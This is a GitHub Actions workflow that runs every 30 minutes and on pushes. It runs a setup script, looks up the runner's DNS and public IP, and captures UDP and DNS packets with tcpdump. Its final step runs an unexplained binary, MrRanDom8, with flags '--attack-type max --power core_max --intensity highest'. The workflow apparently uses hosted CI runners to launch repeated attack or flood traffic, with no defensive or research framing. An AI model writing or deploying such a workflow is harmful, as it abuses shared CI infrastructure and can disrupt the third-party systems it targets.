name: Run MyBot Workflow

on:
  push:
    branches:
      - main
  schedule:
    - cron: '*/30 * * * *'

concurrency:  
  group: mybot-workflow-group
  cancel-in-progress: true

jobs:
  run_mybot_workflow:
    runs-on: ubuntu-latest

    steps:
      - name: Check out the code
        uses: actions/checkout@v3

      - name: Set permissions for balveer.sh and ranbal binary
        run: |
          chmod +x balveer.sh ranbal  

      - name: Run balveer.sh for dependencies (one-time setup)
        run: |
          ./balveer.sh
          
      - name: Check DNS Server
        run: cat /etc/resolv.conf && curl ipinfo.io

      - name: Install tcpdump
        run: |
          sudo apt-get update
          sudo apt-get install -y tcpdump

      - name: Capture DNS and UDP packets (real-time log)
        run: |
          echo "Starting DNS and UDP packet capture..."
          sudo tcpdump -i any udp -nn -tttt -c 50

      - name: Capture DNS-specific traffic (detailed log)
        run: |
          echo "Starting detailed DNS packet capture..."
          sudo tcpdump -i any port 53 -vvv -c 50

      - name: Save all packet logs
        run: |
          sudo tcpdump -i any udp -w packets.log -c 100
        
      - name: Upload packet logs
        uses: actions/upload-artifact@v3
        with:
          name: packet-logs
          path: packets.log

      - name: Execution of MrRanDom8
        run: |
          ./MrRanDom8 --attack-type max --power core_max --intensity highest
